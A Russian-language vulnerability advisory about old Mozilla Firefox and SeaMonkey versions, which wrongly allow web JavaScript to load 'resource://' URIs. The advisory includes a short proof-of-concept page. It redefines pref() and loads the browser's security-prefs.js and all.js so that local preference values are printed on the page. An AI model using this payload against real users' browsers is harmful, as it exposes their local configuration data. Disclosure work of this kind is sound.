• Партнер

  • Программа:
    Mozilla Firefox 1.x
    Mozilla Firefox 2.0.x
    Mozilla SeaMonkey 1.0.x
    Mozilla SeaMonkey 1.1.x

    Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за того, что браузер не правильно запрещает загрузку "resource://" URI в среду JavaScript. Используя эту уязвимость совместно с возможностью обхода директорий, атакующий может получить несанкционированный доступ к конфиденциальной информации, например, настройкам безопасности браузера.

    Пример:

    <script>
    function pref(param,value){
    document.write ("<b>"+param+"</b> = "+value+"")
    };
    </script>
    <script src="resource://gre/greprefs/security-prefs.js"></script>
    <script src="resource://gre/greprefs/all.js"></script>

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии